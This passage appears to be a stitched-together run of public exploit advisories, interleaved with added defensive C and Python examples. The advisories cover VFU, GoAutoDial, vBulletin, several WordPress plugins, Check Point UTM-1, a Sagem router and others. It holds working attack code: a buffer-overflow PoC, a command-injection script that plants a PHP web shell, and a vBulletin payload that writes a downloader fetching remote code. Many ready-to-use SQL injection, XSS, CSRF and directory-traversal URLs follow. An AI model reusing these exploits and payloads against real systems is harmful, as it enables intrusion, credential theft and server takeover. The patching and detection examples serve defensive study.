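           has_markup_chars(safe) ? "yes" : "no");
    return 0;
}
```

The encoder refuses to write a partial result when the output buffer is too small (it returns -1 instead of silently truncating), since a truncated escape such as `&l` would itself reach the page.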
            
# Exploit Title: VFU Move Entry Buffer Overflow
# Date: 2015-02-25
# Exploit Author: Bas van den Berg -- @barrebas
# Vendor Homepage: http://cade.datamax.bg/
# Software Link: http://cade.datamax.bg/vfu/#download
# Version: 4.10-1.1
# Tested on: GNU/Linux Kali 1.09 32-bit & Crunchbang 11 Waldorf (based on Debian Wheezy), kernel 3.2.0-4

# VFU 4.10 (probably up to 4.14) contains a buffer overflow when a user
# moves a file entry around with a large filename. To trigger this 
# vulnerability, extensive user interaction is required.
# Steps to reproduce the bug: create a file with a long (>115 
# characters) filename, run VFU and select 'A' and then 'V' to move the large 
# file entry around. Upon confirming the entry move, VFU crashes due to 
# a buffer overflow in this function:

'''
void vfu_file_entry_move()
{
  char t[128];
  sprintf( t, "MOVE/REORDER File entry: %s", files_list[FLI]->name() );
  say1( t );
  say2( "Use Up/Down Arrows to reorder, ESC,ENTER when done." );
'''

# This overflow allows execution of arbitrary commands with the 
# privilege of the current user. The attached PoC demonstrates this. It 
# drops two files: the large filename and a shellscript that allows 
# arbitrary command execution. Usage: $ python vfu-move-entry-poc.py


import struct
import os

def p(x):
	return struct.pack('<L', x & 0xffffffff)

with open('./vstring.h', 'w') as f:
	f.write('#!/bin/sh\ntouch pwned')
os.chmod('./vstring.h', 0o755)

payload = "A"*115
payload += p(0x8049ca0) # system@plt
payload += p(0x804a260) # exit@plt
payload += p(0x8088e44) # -> ./vstring.h

open(payload, 'w').close()
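The `vfu_file_entry_move()` snippet quoted above formats the filename into `t[128]` with an unbounded `sprintf()`. As an added example, not VFU's code and not part of the PoC, the following C puts the arithmetic behind the ">115 characters" trigger next to a bounded replacement: `unbounded_length()` and `would_overflow()` compute what the original call writes, and `format_move_status()` is a suggested `snprintf()`-based version that reports truncation instead of overflowing. The buffer size and format string are taken from the page; the function names and `make_name()` are mine.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Same buffer size as t[128] in vfu_file_entry_move() on the page. */
#define STATUS_BUF 128
/* The fixed part of the format string shown on the page (25 bytes). */
static const char PREFIX[] = "MOVE/REORDER File entry: ";

/* Bytes the unbounded sprintf() in the original writes, excluding the
 * terminating NUL. Nothing in the original stops this exceeding STATUS_BUF. */
size_t unbounded_length(const char *name) {
    return strlen(PREFIX) + strlen(name);
}

/* True when the original call would write past the end of t[]. */
bool would_overflow(const char *name) {
    return unbounded_length(name) + 1 > STATUS_BUF;
}

/* Suggested replacement (not the project's fix): snprintf() never writes
 * more than outsz bytes and always NUL-terminates. Returns true when the
 * message had to be truncated so the caller can react to it. */
bool format_move_status(char *out, size_t outsz, const char *name) {
    int n = snprintf(out, outsz, "MOVE/REORDER File entry: %s", name);
    if (n < 0) {                 /* encoding error: leave a safe empty string */
        if (outsz) out[0] = '\0';
        return true;
    }
    return (size_t)n >= outsz;   /* n counts what a full write would need */
}

/* Demonstration helper: a filename of `len` 'A's, like the PoC builds. */
void make_name(char *buf, size_t len) {
    memset(buf, 'A', len);
    buf[len] = '\0';
}

int main(void) {
    char name[256], status[STATUS_BUF];

    make_name(name, 115);        /* the PoC's 115-character filename */
    printf("115-char name: sprintf would need %zu bytes for a %d-byte buffer (%s)\n",
           unbounded_length(name) + 1, STATUS_BUF,
           would_overflow(name) ? "OVERFLOW" : "ok");
    bool truncated = format_move_status(status, sizeof status, name);
    printf("snprintf: truncated=%d, strlen=%zu\n", truncated, strlen(status));

    make_name(name, 102);        /* longest name that still fits with the prefix */
    printf("102-char name: %s\n", would_overflow(name) ? "OVERFLOW" : "ok");
    make_name(name, 103);
    printf("103-char name: %s\n", would_overflow(name) ? "OVERFLOW" : "ok");
    return 0;
}
```

With the 25-byte prefix the buffer holds at most a 102-character name; the PoC's 115 characters need 141 bytes including the NUL, which is why the return address lands within reach of the overflow.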
            
[+] Calculated Fields Form Wordpress Plugin <= 1.0.10 - Remote SQL Injection Vulnerability
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Plugin: https://wordpress.org/plugins/calculated-fields-form/

[+] TimeLine
	[-] Feb 6 2015, The vulnerabilities reported
	[-] Feb 7 2015, Response and Confirming the vulnerabilities 
	[-] Feb 8 2015, First fixing released to version 1.0.11
	[-] Feb 17 2015, CSRF protection added to version 1.0.12
	[-] March 1 2015, Public Disclosure

[+] Download: https://downloads.wordpress.org/plugin/calculated-fields-form.1.0.10.zip

[+] Description:
	There are SQL injection vulnerabilities in the Calculated Fields Form plugin
	which could allow an attacker to execute SQL queries against the database.

[+] Vulnerable Code: [Red]
https://plugins.trac.wordpress.org/changeset/1084937/calculated-fields-form

[+] POC: 

/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 and 1=1&name=InsertText 
/wp-admin/options-general.php?page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText // Will update all
/wp-admin/options-general.php?page=cp_calculated_fields_form&c=21 and 1=1 
/wp-admin/options-general.php?page=cp_calculated_fields_form&d=3 and 1=2  Delete

These queries are executed without any CSRF protection, so an attacker can use the CSRF vulnerability to execute the queries by sending a malicious page to a logged-in admin.

[+] Impact: An attacker can use these vulnerabilities to update the admin password

[+] Recommendation: If you are using 1.0.12 or less, Upgrade the plugin ASAP

[+] @lnxg33k Are you happy, Bahlol?
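Both this advisory and the vtiger CRM entry above inject through a parameter the application uses as a numeric id (`onlyforuser`, `u`, `c`, `d`) and then concatenates into SQL. As an added example, not code from either project, the following C shows what those PoC values look like once percent-decoded and the strict-id check that rejects them at the input boundary. The query strings are constructed from the PoC URLs on this page (paths and unrelated parameters dropped), and `url_decode()`, `query_param()`, `strict_id()` and `query_id()` are names of my own. A check like this complements parameterized queries in the data layer; it does not replace them, and it does nothing about the missing CSRF protection, which needs a per-request token check.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Percent-decode `inlen` bytes of a query-string value ('+' is a space, as
 * in the PoC URLs). Returns the decoded length, or -1 when the encoding is
 * malformed or `out` cannot hold the result plus a NUL. */
int url_decode(const char *in, size_t inlen, char *out, size_t outsz) {
    size_t o = 0;
    for (size_t i = 0; i < inlen; i++) {
        if (o + 1 >= outsz) return -1;
        if (in[i] == '+') {
            out[o++] = ' ';
        } else if (in[i] == '%') {
            if (i + 2 >= inlen) return -1;            /* truncated %XX */
            int h = hexval((unsigned char)in[i + 1]);
            int l = hexval((unsigned char)in[i + 2]);
            if (h < 0 || l < 0) return -1;
            out[o++] = (char)(h * 16 + l);
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return (int)o;
}

/* Copy the decoded value of `key` out of `query`. False if absent or malformed. */
bool query_param(const char *query, const char *key, char *out, size_t outsz) {
    size_t klen = strlen(key);
    const char *p = query;
    while (p && *p) {
        const char *amp = strchr(p, '&');
        size_t plen = amp ? (size_t)(amp - p) : strlen(p);
        if (plen > klen && strncmp(p, key, klen) == 0 && p[klen] == '=')
            return url_decode(p + klen + 1, plen - klen - 1, out, outsz) >= 0;
        p = amp ? amp + 1 : NULL;
    }
    return false;
}

/* Strict numeric id: non-empty, ASCII digits only, at most 9 of them (fits an
 * unsigned long everywhere). Everything the PoC appends after the number
 * ("1 or 1=1--", "2 or 1=1", "3 and 1=2") fails here before any SQL is built. */
bool strict_id(const char *s, unsigned long *val) {
    size_t n = strlen(s);
    if (n == 0 || n > 9) return false;
    for (size_t i = 0; i < n; i++)
        if (!isdigit((unsigned char)s[i])) return false;
    *val = strtoul(s, NULL, 10);
    return true;
}

/* Extract `key` from `query` and validate it as an id in one step. */
bool query_id(const char *query, const char *key, unsigned long *val) {
    char buf[256];
    if (!query_param(query, key, buf, sizeof buf)) return false;
    return strict_id(buf, val);
}

/* Constructed from the PoC URLs on this page. */
static const char *const VTIGER_PROBE =
    "action=index&module=Calendar&view=week&onlyforuser=1+or+1%3d1--";
static const char *const CFF_UPDATE_PROBE =
    "page=cp_calculated_fields_form&u=2 or 1=1&name=InsertText";
static const char *const CFF_DELETE_PROBE =
    "page=cp_calculated_fields_form&d=3 and 1=2";
static const char *const BENIGN =
    "page=cp_calculated_fields_form&u=2&name=InsertText";

int main(void) {
    const char *cases[][2] = {
        { VTIGER_PROBE, "onlyforuser" }, { CFF_UPDATE_PROBE, "u" },
        { CFF_DELETE_PROBE, "d" },       { BENIGN, "u" },
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++) {
        char raw[256] = "";
        unsigned long id = 0;
        query_param(cases[i][0], cases[i][1], raw, sizeof raw);
        bool ok = query_id(cases[i][0], cases[i][1], &id);
        printf("%-12s = \"%s\" -> %s\n", cases[i][1], raw,
               ok ? "accepted" : "rejected (not a plain id)");
    }
    return 0;
}
```

Decoding first matters: the vtiger probe arrives as `1+or+1%3d1--` and only becomes `1 or 1=1--` after the `+` and `%3d` are decoded, which is the form the database would see.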
            
# Title : GoAutoDial CE 2.0 Shell Upload
# Date : 28/02/2015 
# Author : R-73eN
# Software : GoAutoDial CE 2.0
# Tested : On Linux vicisrv.loc 2.6.18-238.9.1.el5.goPAE #1  GoAutoDial CE 2.0

import socket
import sys
banner = "\n\n"
banner +="  ___        __        ____                 _    _  \n"  
banner +=" |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    \n"
banner +="  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    \n"
banner +="  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ \n"
banner +=" |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|\n\n"
print banner
CRLF = "\r\n"
def checkvuln():
	command = "uname"
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Linux") != -1):
		print '[ + ] Server Is vulnerable [ + ]\n'
		shellupload()
	else: 
		print '[ - ] Server is not vulnerable [ - ]\n'
	s.close()


def shellupload():
	command = "echo 'Infogen-AL<br><?php echo system($_GET['cmd']);?>' > /var/www/html/infogen.php"
	#command = "rm /var/www/html/123.pl;rm /var/www/html/TEST.perl"
	command = command.replace(" ", "%20")
	evil = path + '/manager_send.php?enable_sipsak_messages=1&allow_sipsak_messages=1&protocol=sip&ACTION=OriginateVDRelogin&session_name=AAAAAAAAAAAA&server_ip=%27%20OR%20%271%27%20%3D%20%271&extension=%3B' + command + '%3B&user=' + user + '&pass=' + password
	s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect((host,80))
	evilREQ = 'GET ' + evil + ' HTTP/1.1' + CRLF + 'Host: ' + host + CRLF + 'User-Agent: Infogen-AL' + CRLF + CRLF + CRLF
	s.send(evilREQ)
	a = s.recv(1024)
	if(a.find("HTTP/1.1 200 OK") != -1 and a.find("Invalid") == -1):
		print '[ + ] Shell uploaded successfully [ + ]\n'
		print '[ + ] http://' + host + '/infogen.php [ + ]\n'
	else:
		print '[ - ] Shell upload failed.... [ - ]'
	s.close()

if(len(sys.argv) < 4):
	print '\n Usage : exploit.py 127.0.0.1 /goautodial-agent/ agentuser agentpassword\n'
else:
	host = sys.argv[1]
	path = sys.argv[2]
	user = sys.argv[3]
	password = sys.argv[4]
	checkvuln()
	print 'Visit Us : http://infogen.al/'
            
#################################################################################################################
[+] Exploit Title: vBulletin 4.x.x 'visitormessage.php' Remote Code Injection Vulnerability
[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
#################################################################################################################
Remote Code Injection:
+++++++++++++++++++++++++
1) You must register on the vBulletin site at http://server/register.php, example: [blackhat]

2) Go to your user profile, example: [http://server/members/blackhat.html]

3) Post something as a visitor message and record the POST data with Live HTTP Headers

[example] : message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4) Change the message to anything else, "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin does not let you send the same comment twice]

[Now post this with HackBar:]

URL:  http://server/visitormessage.php?do=message

[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=
1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

[And the referrer data:]
PoC : http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

[Example referrer data:] > uploads downloader.php and s.php
PoC : http://server/members/g3n3rall.html?a=$stylevar%5b$%7b$%7bfile_put_contents(
"downloader.php","\x3C\x3F\x70\x68\x70\x0D\x0A\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x20\x3D\x20\x66\x69\x6C\x65\x5F\x67\x65\x74\x5F\x63\x6F\x6E\x74\x65\x6E\x74\x73\x28\x27\x68\x74\x74\x70\x3A\x2F\x2F\x70\x61\x69\x65\x6E\x63\x68\x61\x74\x2E\x63\x6F\x6D\x2F\x64\x2F\x64\x72\x2E\x74\x78\x74\x27\x29\x3B\x0D\x0A\x24\x66\x20\x3D\x20\x66\x6F\x70\x65\x6E\x28\x27\x73\x2E\x70\x68\x70\x27\x2C\x27\x77\x27\x29\x3B\x0D\x0A\x66\x77\x72\x69\x74\x65\x28\x24\x66\x2C\x24\x68\x6F\x6D\x65\x70\x61\x67\x65\x29\x3B\x0D\x0A\x3F\x3E")}}]

5) Open HackBar and modify the request with Tamper Data:
The referrer data has been URL-encoded by the browser, so you have to replace it again using Tamper Data: http://server/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked")}}]

and submit the request.

################################################################################################################
            
source: https://www.securityfocus.com/bid/50096/info

The Pretty Link plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Pretty Link Plugin 1.4.56 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/head.php?min_date=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_record=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
            
source: https://www.securityfocus.com/bid/50108/info

G-WAN is prone to a buffer-overflow vulnerability and a denial-of-service vulnerability.

Remote attackers can exploit these issues to execute arbitrary code in the context of the application or crash the affected application.

G-WAN 2.10.6 is vulnerable; other versions may also be affected. 

while: do echo -e "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\r\n' 
            
source: https://www.securityfocus.com/bid/50133/info

PROMOTIC is prone to multiple security vulnerabilities.

Exploiting these issues may allow remote attackers to execute arbitrary code within the context of the affected application or disclose sensitive information.

PROMOTIC 8.1.3 is vulnerable; other versions may also be affected. 

http://www.example.com/webdir/..\..\..\..\..\boot.ini
            
source: https://www.securityfocus.com/bid/50141/info

Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables

http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273

http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
            
source: https://www.securityfocus.com/bid/50167/info

asgbookphp is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. 

http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> 
            
source: https://www.securityfocus.com/bid/50168/info

Multiple Toshiba e-Studio devices are prone to a security-bypass vulnerability.

Successful exploits will allow attackers to bypass certain security restrictions and gain access in the context of the device. 

http://www.example.com/TopAccess//Administrator/Setup/ScanToFile/List.htm 
            
source: https://www.securityfocus.com/bid/50189/info

Check Point UTM-1 Edge and Safe are prone to multiple security vulnerabilities, including:

1. Multiple cross-site scripting vulnerabilities
2. Multiple HTML-injection vulnerabilities
3. Multiple cross-site request forgery vulnerabilities
4. Multiple URI-redirection vulnerabilities
5. An information-disclosure vulnerability

An attacker may leverage these issues to access sensitive information, redirect an unsuspecting victim to an attacker-controlled site, or steal cookie-based authentication credentials, to perform unauthorized actions in the context of a user's session.

Versions prior to Check Point UTM-1 Edge and Safe 8.2.44 are vulnerable. 

Tested on versions 7.5.48x, 8.1.46x and 8.2.2x.


1) The following demonstrate the reflected XSS flaws:

a) The ufp.html page is vulnerable to XSS via the url parameter.
It works by submitting a malicious url parameter to the ufp.html page:
http://www.example.com/pub/ufp.html?url=";><script>alert(1)</script>&mask=000&swpreview=1

This works with firmware versions 7.5.48x, 8.1.46x and 8.2.2x.

b) The login page is also vulnerable to XSS via a malicious session cookie.
It works by submitting a malicious session cookie to the login page:
Cookie: session="><script>alert(1)</script>

c) An authenticated XSS exists within the diagnostics command:
http://www.example.com/diag_command.html?sw__ver=blah1&swdata=blah2&sw__custom='";);alert(1);//
(this might need to be submitted twice)


2) The following demonstrate the persistent XSS and XSRF flaws:

a) The blocked URL warning page is vulnerable to a persistent XSS attack, placing any internal users at risk of attack when the page is displayed.

First an attacker has to trick the administrator into following an XSRF link; the session cookie (swsessioncookie) is shown here for simplicity's sake, though JavaScript's document.cookie can be used to subvert this protection (see paper).
http://www.example.com/UfpBlock.html?swcaller=UfpBlock.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&ufpblockhttps=0&ufpbreakframe=&backurl=WebRules.html&ufpblockterms=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E

Firewall users then visiting blocked sites will have the blocked page displayed and the attack carried out.
http://www.example.com/pub/ufp.html?url=www.blockedUrl.com&mask=000&swpreview=1

b) The Wi-Fi hotspot landing page on Wi-Fi enabled firewalls is also vulnerable, with any user of the Wi-Fi access point being at risk.

First an attacker has to trick the administrator into following an XSRF link; the session cookie (swsessioncookie) is shown here for simplicity's sake, though JavaScript's document.cookie can be used to subvert this protection (see paper).
http://www.example.com/HotSpot.html?swcaller=HotSpot.html&swsessioncookie=20KHYp5-oS7rKmS-a4rq4j&swsave=1&hotspotnets=00000000000000000000000000000000000000&hotspotpass=1&hotspotmulti=1&hotspothttps=0&hotspotnet1=0&hotspotnet2=0&hotspotnet3=0&hotspotenf=0&hotspottitle=Welcome+to+My+HotSpot&hotspotterms=%22%3E%3Cscript%3Ealert%282%29%3C%2Fscript%3E&thotspotpass=on&thotspotmulti=on

Firewall users then visiting the Wi-Fi landing page will have the attack carried out.
http://www.example.com/pub/hotspot.html?swpreview=1


3) The following demonstrate the (authenticated) offsite redirection flaws:

a) Enter the following URL to redirect:
http://www.example.com/12?swcaller=http://www.procheckup.com

b) Enter the following URL and then press the back button:
http://www.example.com/UfpBlock.html?backurl=http://www.procheckup.com

4) The following demonstrate the information disclosure flaws (no authentication needed).
It was found that the /pub/test.html program disclosed information regarding the patch level used, licensing and the MAC addresses to unauthenticated users.

a) On early firmware versions 5.0.82x, 6.0.72x, 7.0.27x and 7.5.48x
Just requesting http://www.example.com/pub/test.html is sufficient.

b) This no longer worked on versions 8.1.46x and 8.2.26x; however, adding the url parameter and a double quote bypassed this check:
https://www.example.com/pub/test.html?url="
            
# Title              : Sagem F@st 3304-V2 Directory Traversal Vulnerability
# Vendor             : http://www.sagemcom.com
# Severity           : High
# Tested Router      : Sagem F@st 3304-V2 (3304, other versions may also be affected)
# Date               : 2015-03-01
# Author             : Loudiyi Mohamed
# Contact            : Loudiyi.2010@gmail.com
# Blog               : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
 
# Vulnerability description:
Sagem F@st is an ADSL router that uses a web management interface to change configuration settings.
The web server of the router is vulnerable to directory traversal, which allows reading arbitrary files
by sending encoded '../' sequences in requests.

The vulnerability may be tested with the following command-line:
curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd
Or directly from the browser:
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp
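As an added defensive example that is not part of this advisory, the following Python script scans web-server access-log lines for traversal attempts: it catches the encoded "%2f..%2f" form shown above, the plain "//../../" form from the curl command, and the backslash form ("..\..\") from the PROMOTIC advisory earlier on this page, and goes beyond the page by also handling double percent-encoding. The log lines and client IP addresses are constructed samples.

```python
# Added detection example (not the advisory's code): flag request paths in
# access logs that climb above the document root once percent-decoded.
import re
from urllib.parse import unquote

# Constructed sample log lines in Common Log Format (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Mar/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
192.0.2.10 - - [01/Mar/2015:10:00:02 +0000] "GET //../../../etc/passwd HTTP/1.1" 200 1234
192.0.2.10 - - [01/Mar/2015:10:00:03 +0000] "GET /%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1234
192.0.2.11 - - [01/Mar/2015:10:00:04 +0000] "GET /webdir/..\\..\\..\\boot.ini HTTP/1.1" 200 300
192.0.2.12 - - [01/Mar/2015:10:00:05 +0000] "GET /images/../css/style.css HTTP/1.1" 200 100
192.0.2.12 - - [01/Mar/2015:10:00:06 +0000] "GET /a/%252e%252e/%252e%252e/etc/passwd HTTP/1.1" 404 0
"""

# Pulls the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def decode_path(raw_path, max_rounds=3):
    """Drop the query string, percent-decode repeatedly (so double encoding
    such as %252e is unwrapped too) and treat backslashes as separators,
    as a Windows-hosted server like PROMOTIC would."""
    path = raw_path.split("?", 1)[0]
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(raw_path):
    """True if the decoded path ever steps below the document root.
    Walking the segments with a depth counter keeps harmless
    '/images/../css' (depth never goes negative) while flagging
    '//../../../etc/passwd' (first '..' already leaves the root)."""
    depth = 0
    for part in decode_path(raw_path).split("/"):
        if part == "..":
            depth -= 1
            if depth < 0:
                return True
        elif part and part != ".":
            depth += 1
    return False


def find_traversal_requests(log_text):
    """Return (client_ip, raw_path, decoded_path) for each suspicious line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        raw = match.group(1)
        if is_traversal(raw):
            hits.append((line.split(" ", 1)[0], raw, decode_path(raw)))
    return hits


if __name__ == "__main__":
    for ip, raw, decoded in find_traversal_requests(SAMPLE_LOG):
        print(f"{ip} traversal attempt: {raw} -> {decoded}")
```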
            
source: https://www.securityfocus.com/bid/50195/info

Site@School is prone to multiple SQL-injection and cross-site scripting vulnerabilities.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

XSS:

http://www.example.com/school/starnet/index.php?option=stats&suboption='"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script>

http://www.example.com/school/starnet/index.php?option=modulemanager&module='"</style></script><script>alert(document.cookie)</script>

SQL Injection:

http://www.example.com/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection]

http://www.example.com/school/starnet/index.php?option=modulemanager&module=[sql injection]
            
# Exploit Title: [ wordpress theme photocrati 4.X.X SQL INJECTION ]
# Google Dork: [ Designed by Photocrati ] also [powered by Photocrati]
# Date: [23 / 09 / 2011 ]
# Exploit Author: [ ayastar ]
# Email : dmx-ayastar@hotmail.fr
# Software Link: [ http://www.photocrati.com ]
# Version: [4.X.X]
# Tested on: [ windows 7 ]


--------
details |
=======================================================
Software : photocrati
version : 4.X.X
Risk : High
remote : yes

An attacker can perform a remote SQL injection through the site URL to obtain sensitive information.
Almost all versions are affected by this vulnerability.
=======================================================
Exploit code :
http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL]

greetz to all muslims and all tryag members
:) from morocco
            
# Exploit Title: WordPress: cp-multi-view-calendar.1.1.4 [SQL Injection vulnerabilities]
# Date: 2015-02-28
# Google Dork: Index of /wordpress/wp-content/plugins/cp-multi-view-calendar
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-multi-view-calendar.1.1.4.zip
# Version: 1.1.5
# Tested on: Windows 7 Ultimate + sqlmap 0.9. It's a PHP application
# OWASP Top10: A1-Injection
# Mitigations: Upgrade to version 1.1.5

Greetz to Christian Uriel Mondragon Zarate

Video demo of the unauthenticated SQL injection exploitation:



###################################################################

ADMIN PAGE SQL INJECTION
-------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_add_calendar

SQL injection in POST parameter viewid

-------------------------------------------------------------------

http://localhost/wordpress/wp-admin/admin-ajax.php?action=ajax_delete_calendar

SQL injection in POST parameter id


########################################

UNAUTHENTICATED SQL INJECTION
-----------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1

SQL injection in the id parameter

-----------------------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=datafeed&method=list&calid=1

POST data: viewtype=list&list_order=asc; vulnerable variable: list_order


################################################################

CROSS-SITE SCRIPTING VULNERABILITY
----------------------------------------------------------

http://localhost/wordpress/?action=data_management&cpmvc_do_action=mvparse&weekstartday=alert(12)&f=edit&id=1

Cross-site scripting in the weekstartday parameter

###################################################

==================================

time-line

26-02-2015: vulnerabilities found
27-02-2015: reported to vendor
28-02-2015: new cp-multi-view-calendar version 1.1.4 released
28-02-2015: full disclosure

===================================
            
source: https://www.securityfocus.com/bid/50018/info

BuzzScripts BuzzyWall is prone to an information-disclosure vulnerability because it fails to sufficiently validate user-supplied data.

An attacker can exploit this issue to download local files in the context of the webserver process. This may allow the attacker to obtain sensitive information; other attacks are also possible.

BuzzyWall 1.3.2 is vulnerable; other versions may also be affected. 

http://www.example.com/resolute.php?img=config.php 
            
source: https://www.securityfocus.com/bid/50019/info

The 'com_expedition' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/index.php?option=com_expedition&task=detail&id=-3235' 
            
source: https://www.securityfocus.com/bid/50039/info
 
GoAhead WebServer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
 
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
 
GoAhead WebServer 2.18 is vulnerable; other versions may also be affected. 

POST /goform/AddAccessLimit HTTP/1.1
url=<script>alert(1337)</script>&group=test&method=3&ok=OK
            
source: https://www.securityfocus.com/bid/50022/info

Jaws is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.

